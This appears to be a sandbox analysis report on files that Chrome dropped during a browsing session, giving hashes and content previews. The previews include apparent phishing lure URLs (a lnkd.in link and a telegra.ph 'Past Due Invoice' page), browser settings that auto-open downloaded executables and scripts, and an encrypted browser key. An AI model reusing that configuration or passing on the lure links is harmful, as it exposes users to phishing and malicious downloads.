                                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.652500003100843e+12,"network":1.652467604e+12,"ticks":267058633.0,"uncertainty":3801552.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230364709079"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                            Entropy (8bit):3.3041625260016576
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:FkXEwozZHn:+EwozZHn
                                                                                                                                                                                                                            MD5:BEBB369FF4A565B19D5E0BC83CD176AE
                                                                                                                                                                                                                            SHA1:A6F07666F8DDDF61E5AACE533129BFB541A8A769
                                                                                                                                                                                                                            SHA-256:8018F98553432706436A31FFD1E743018C3B7F1AA8D34B2FA18F494A4CFCEB19
                                                                                                                                                                                                                            SHA-512:5D2F9F6E9502517AFF4673C3157D57046D4E38D70B5E228F468FB820363E559087D1A2F2E4006B4589BF3F175A4507F1FA3D7BE5FC34F9FA39EB17757DAEC17F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:sdPC.......................y3..M.Y.NbD.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):17529
                                                                                                                                                                                                                            Entropy (8bit):5.5745610261631375
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:SCYt5Ll0zXE1kXqKf/pUZNCgVLH2HfDtrURleim4h:qLl+E1kXqKf/pUZNCgVLH2Hf5rUbme
                                                                                                                                                                                                                            MD5:5469CBD39968BF9AF6C1883A3C61BD4F
                                                                                                                                                                                                                            SHA1:78FE5BFBFBDF2F7CA77F2444B6A932CD8CF9FA26
                                                                                                                                                                                                                            SHA-256:441FF43E5AFE5DB4DBEB37DDA67EA411E4D62CE8B74CCD86F33B66D9F79B8380
                                                                                                                                                                                                                            SHA-512:2B2F4221E6A1B9975D154892B7210BA2CD738BA3FB3E9897FF8772AC197E6C8E481727A3C677277A7E71BBEA4C9968399990AE8B73481D84DC6BE8DD89AEF276
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13296973600684277","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):19793
                                                                                                                                                                                                                            Entropy (8bit):5.5641994896321245
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:SCYtsLl0zXE1kXqKf/pUZNCgVLH2HfDtrU5HGfowlqim4jbY:9Ll+E1kXqKf/pUZNCgVLH2Hf5rUdGfoD
                                                                                                                                                                                                                            MD5:114B182EBEE38ABDD5B0EBBAAC9DCC99
                                                                                                                                                                                                                            SHA1:EB7E7542B15C8495FE4A7A94EB62392227138B5E
                                                                                                                                                                                                                            SHA-256:3CA41610716732EAD813BE91AB5AFD43F23AF4C7CDD0559A8BEC6A6528543F0E
                                                                                                                                                                                                                            SHA-512:D40213E4DDC984A2F240599D260F13C2638F2DFD99A60ACC3AB6D88747B4915D923DE2FEADC753646FB9001A97B713384C6FECF0072A8E28100317807D5720F5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13296973600684277","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):17703
                                                                                                                                                                                                                            Entropy (8bit):5.576832466187267
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:SCYtsLl0zXE1kXqKf/pUZNCgVLH2HfDtrUvowlsim4e:9Ll+E1kXqKf/pUZNCgVLH2Hf5rUvosmV
                                                                                                                                                                                                                            MD5:6F3E7F38E4FE912A749431AE539EF8DE
                                                                                                                                                                                                                            SHA1:DDD130190A83D9305B3C831A1A06B37516CBE051
                                                                                                                                                                                                                            SHA-256:E4FB4816919FC4E5D56B15E9D14795AFF8B97095C24B636140B517D18E22E14D
                                                                                                                                                                                                                            SHA-512:D827C0460BCF0693D07183ADCD01E1118D06014415DEEDD9951319F9C5E307F1B44A245A50E9543CABED4F75BA4C58D87C2F67EBAB2AC53D472CE5322B9673BC
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13296973600684277","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):5407
                                                                                                                                                                                                                            Entropy (8bit):5.007331079463071
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:n8Xbf5v1paAKIpyxk0JCKL8oplkVXSiJkYnS1fhbOTQVuwn:n8XbN1p9PK4KtkVRkVBh
                                                                                                                                                                                                                            MD5:29971E3C782F89D0C832414A7873B75F
                                                                                                                                                                                                                            SHA1:D600CF04A9008EBB9DB7461E4636B0613F2F8482
                                                                                                                                                                                                                            SHA-256:2D85F441C416F1365B8709941999895EF1FC80C015F7618FE04D3CA305DBA1EE
                                                                                                                                                                                                                            SHA-512:9156287211B9FD31A07B86AA1411BB9C4AEBDFCD70180B6DFE64A4B218CCC2A8F2557F66A622870E97017E4288644524E9FA77A5819019B954582C7FC5FDC688
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13296973601651165","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245952963463509","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1501624"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5157
                                                                                                                                                                                                                            Entropy (8bit):4.983205856378321
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:n8XbQcv1paAKIpyxk0JCKL8IiJkYnS1fd7bOTQVuwn:n8Xbf1p9PK4KIkVBV
                                                                                                                                                                                                                            MD5:061F08D2D1B316435A854FFC70F6014A
                                                                                                                                                                                                                            SHA1:964801448D51F179307C6387A2BC76D8E1791C0E
                                                                                                                                                                                                                            SHA-256:FC970FFF6C22E23C6E98343A41ADB68478F43ADC4A4DA8AA1C2E9267A2803B11
                                                                                                                                                                                                                            SHA-512:738FA021D663CB6526BC446D6CDF830662060CE4721F06FC7578B737A560855C78EC4EDC5FFB66A794763F03DE3E4896CF58A1DDC9D6D03AC098E3BF49C8AA80
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13296973601651165","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245952963463509","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1501624"],"daily_received_length":["0","0","0","0","0","0","0","
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):19792
                                                                                                                                                                                                                            Entropy (8bit):5.563928584699254
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:SCYtsLl0zXE1kXqKf/pUZNCgVLH2HfDtrU5HGIowltim4r:9Ll+E1kXqKf/pUZNCgVLH2Hf5rUdGIoD
                                                                                                                                                                                                                            MD5:D4111EDF1358F8DF172B5A8E08069770
                                                                                                                                                                                                                            SHA1:73908E078277B2670D1626A0156F62ED09B8BC29
                                                                                                                                                                                                                            SHA-256:A0EA5C36E761E13FFAC840FBD35611B3DEAAC36BE3F0D06D2507B8806E899A68
                                                                                                                                                                                                                            SHA-512:BBAB97AC5E996ACA2BA63F891DFD7F0B8D7A820F8B4617C9704C0BB4345DCFAC2CC5DB45BB2826D0E7398E0AF293888E00EE778D4755B2AAC3559C21D0ACB323
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13296973600684277","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):11217
                                                                                                                                                                                                                            Entropy (8bit):6.069602775336632
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:GbylJnlTwGB7V9Hne4qasKxXItmLG48gcLg/PkI:Gb+nldByaFx4toj8VEPT
                                                                                                                                                                                                                            MD5:90F880064A42B29CCFF51FE5425BF1A3
                                                                                                                                                                                                                            SHA1:6A3CAE3996E9FFF653A1DDF731CED32B2BE2ACBF
                                                                                                                                                                                                                            SHA-256:965203D541E442C107DBC6D5B395168123D0397559774BEAE4E5B9ABC44EF268
                                                                                                                                                                                                                            SHA-512:D9CBFCD865356F19A57954F8FD952CAF3D31B354112766C41892D1EF40BD2533682D4EC3F4DA0E59A5397364F67A484B45091BA94E6C69ED18AB681403DFD3F3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"file_hashes":[{"block_hashes":["A+1PYW3V6CJbBuQ7aqrgYhyH3bT8PKyBXp3hN2slpI0=","WSOpQRkYTHjPSlG9Zif2a7TNhy43NDcG1Zg5Nv0UbH0=","jDctR8ImG5KZrQKm4kDjUB7FokSJfjo/pmvFowRVlaY=","LPxhhJiuU0lprt0T6flpS7TkaDg7MocrbmzO65xH6RI=","nZ9zLb2By96AkKXALRM+C0Eu11XUjPiMXEKjiCPdtHE=","wifibc1QfMBN2jrtUtLgsCefvuceTpAatmLvul11RJA=","dHjWlSIIdjj7MWqg3T8MG58RuuqRXk32vqi/13JqEgA=","zd3DV7dbvfNvx1hdhU01fW5ily52DLN0CFL/ADaEeTI=","DpjXcO85FFFY9KJFPkGNfFUtdQIOsGwO5jUckiUwY14=","gqid6l1+mk/6yWgUECRofI9lMipXgXh2jEN2+CxmPE0=","prDB91X2Mmfg/M/txVMITWBmEGbOGjqBTP7CMjYqdHs=","yLPAqV4gqoyS/zFkEt3Cn2j0q2v9QOSthVFfWn8EzCM=","EPQ3jzdrLkAHyvf3920B5Y3aAkO1IJdn/UtbnAmq6T0=","+oOc6ca+ChKUpTu+oa2ZRxRE+wG3QJmuYWEvYCs40NI=","3mBGNAiRlTANEQkqzU3TEi+5wJ0ubR5uwtS4/9OOM7w=","1A9NNawxuhu95H5eThvf1rewJ4QQWhhPNxJXO1C/n68=","E3vWLQxzmj+e5QxYbUscllJ5n0ITpw5JBHV1Kph3/KM=","i3I8ghdTF9c1ZXNBZmvsID+DV4gxBVN27rj9wsMtRpg=","R8B8qYabnMSlLPhrtu0hGYrHn3llsMHqBbi70gkIjEE=","rhlzuEvv2KRAFMms896xFwkNgPrw6WvmgPn6xrBSa2Y=","LAMXv6sRb0VZrY34aVXF3Fftxs
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):38
                                                                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:FQxlXNQxlX:qTCT
                                                                                                                                                                                                                            MD5:51A2CBB807F5085530DEC18E45CB8569
                                                                                                                                                                                                                            SHA1:7AD88CD3DE5844C7FC269C4500228A630016AB5B
                                                                                                                                                                                                                            SHA-256:1C43A1BDA1E458863C46DFAE7FB43BFB3E27802169F37320399B1DD799A819AC
                                                                                                                                                                                                                            SHA-512:B643A8FA75EDA90C89AB98F79D4D022BB81F1F62F50ED4E5440F487F22D1163671EC3AE73C4742C11830214173FF2935C785018318F4A4CAD413AE4EEEF985DF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.f.5................f.5...............
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):378
                                                                                                                                                                                                                            Entropy (8bit):5.252155999057358
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:Ai39D4q2PN723iKKdK25+Xqx8chI+IFUtqVfi3O3JZmwYVfi3zDDkwON723iKKdP:Ai3mvVa5KkTXfchI3FUtii3OZ/Ii3zXa
                                                                                                                                                                                                                            MD5:648F3BE5508452B5FECEA61AEF48A958
                                                                                                                                                                                                                            SHA1:EFC0C08767868C99DEC5ABB5396751F4453A9992
                                                                                                                                                                                                                            SHA-256:F9D2E550E427591987A7F5CCCCA2AB2E7DC86D0DAD1414FA702DF42286D74778
                                                                                                                                                                                                                            SHA-512:F9554206ED897ACB589C0F99E8A0FBC014BC721EA2482CF3E1177EB8F12E6D3F1DFEFF40301570ACCD2547A57EFFBF8C0D6FAC86DA98F59F77BAE11DE623003E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:2022/05/13-20:46:54.757 1344 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2022/05/13-20:46:54.758 1344 Recovering log #3.2022/05/13-20:46:54.759 1344 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):378
                                                                                                                                                                                                                            Entropy (8bit):5.252155999057358
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:Ai39D4q2PN723iKKdK25+Xqx8chI+IFUtqVfi3O3JZmwYVfi3zDDkwON723iKKdP:Ai3mvVa5KkTXfchI3FUtii3OZ/Ii3zXa
                                                                                                                                                                                                                            MD5:648F3BE5508452B5FECEA61AEF48A958
                                                                                                                                                                                                                            SHA1:EFC0C08767868C99DEC5ABB5396751F4453A9992
                                                                                                                                                                                                                            SHA-256:F9D2E550E427591987A7F5CCCCA2AB2E7DC86D0DAD1414FA702DF42286D74778
                                                                                                                                                                                                                            SHA-512:F9554206ED897ACB589C0F99E8A0FBC014BC721EA2482CF3E1177EB8F12E6D3F1DFEFF40301570ACCD2547A57EFFBF8C0D6FAC86DA98F59F77BAE11DE623003E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:2022/05/13-20:46:54.757 1344 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2022/05/13-20:46:54.758 1344 Recovering log #3.2022/05/13-20:46:54.759 1344 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):868
                                                                                                                                                                                                                            Entropy (8bit):5.486196893625347
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:lD/mdO4EmFVuUaiZVbdvuV+ui7dtN0NYuuRkgl0nEBoMQ:lDedF4Uav417dtNhA/D
                                                                                                                                                                                                                            MD5:A364B5EB02A8EB37238DFD6BEE9175B1
                                                                                                                                                                                                                            SHA1:D12815F469270EE6D24B1EC611C0D9EAAD4373E7
                                                                                                                                                                                                                            SHA-256:DF9AA04981B96D4D0586E577A22E2B6B33C22C1C144B99435E212756B9259593
                                                                                                                                                                                                                            SHA-512:92D3CC19E2B0511060863ACD00CEBAE3ACDC2A60AB7F40D76CC55E34244300460716908B100AD679E18EADC146FD3B754FE90AFE7B2B697479FDD3A0D1C1150D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:............"[....dptwhpaa..due..https..in..invoices..lnkd..past..telegraph..05..13..invoice..ph..telegra*........05......13......dptwhpaa......due......https......in......invoice......invoices......lnkd......past......ph......telegra......telegraph..2.........0........1........3........5........a...........c.........d..........e............g.........h...........i..........k........l..........n...........o.........p............r.........s..........t............u........v.........w...:|............................................................................................................................B.....[...... ......*.https://lnkd.in/dptWHpAa2.Past Due Invoices . Telegraph:...............q...... ......*)https://telegra.ph/Past-Due-Invoice-05-132.Past Due Invoices . Telegraph:...................J&..............................$'......
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2354
                                                                                                                                                                                                                            Entropy (8bit):4.905265434831656
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:YALteBdpNntw3qyvTCXDHz5sSvGsSERLsS4ScSbsS2RsSvitMHJssSlAMH0bG:2lNnOa+TCXDHz5voExDci2x6tGJGuG0S
                                                                                                                                                                                                                            MD5:7E735CF579679FF87D05FB7211632226
                                                                                                                                                                                                                            SHA1:76FB72D53102873FE98B344CA93C67D2E4F05B51
                                                                                                                                                                                                                            SHA-256:B7000BAB99915CDF2737CE9398B67493B33672B3C87478C2BB3D2FD99C91521F
                                                                                                                                                                                                                            SHA-512:C64F70054C0A0883D590DCC18FD8268D3B4C7FD31ECE6DACA65E6615320F8EC08B4F35F158EE26BD764F01020769114017BDACF5E32D8AD257F494B39533D74A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":1,"host":"www.google.com","isolation":[],"port":443,"protocol_str":"quic"},{"broken_count":1,"host":"accounts.google.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5407
                                                                                                                                                                                                                            Entropy (8bit):5.007331079463071
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:n8Xbf5v1paAKIpyxk0JCKL8oplkVXSiJkYnS1fhbOTQVuwn:n8XbN1p9PK4KtkVRkVBh
                                                                                                                                                                                                                            MD5:29971E3C782F89D0C832414A7873B75F
                                                                                                                                                                                                                            SHA1:D600CF04A9008EBB9DB7461E4636B0613F2F8482
                                                                                                                                                                                                                            SHA-256:2D85F441C416F1365B8709941999895EF1FC80C015F7618FE04D3CA305DBA1EE
                                                                                                                                                                                                                            SHA-512:9156287211B9FD31A07B86AA1411BB9C4AEBDFCD70180B6DFE64A4B218CCC2A8F2557F66A622870E97017E4288644524E9FA77A5819019B954582C7FC5FDC688
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13296973601651165","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245952963463509","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1501624"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):19793
                                                                                                                                                                                                                            Entropy (8bit):5.5641994896321245
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:SCYtsLl0zXE1kXqKf/pUZNCgVLH2HfDtrU5HGfowlqim4jbY:9Ll+E1kXqKf/pUZNCgVLH2Hf5rUdGfoD
                                                                                                                                                                                                                            MD5:114B182EBEE38ABDD5B0EBBAAC9DCC99
                                                                                                                                                                                                                            SHA1:EB7E7542B15C8495FE4A7A94EB62392227138B5E
                                                                                                                                                                                                                            SHA-256:3CA41610716732EAD813BE91AB5AFD43F23AF4C7CDD0559A8BEC6A6528543F0E
                                                                                                                                                                                                                            SHA-512:D40213E4DDC984A2F240599D260F13C2638F2DFD99A60ACC3AB6D88747B4915D923DE2FEADC753646FB9001A97B713384C6FECF0072A8E28100317807D5720F5
                                                                                                                                                                                                                            Malicious:false
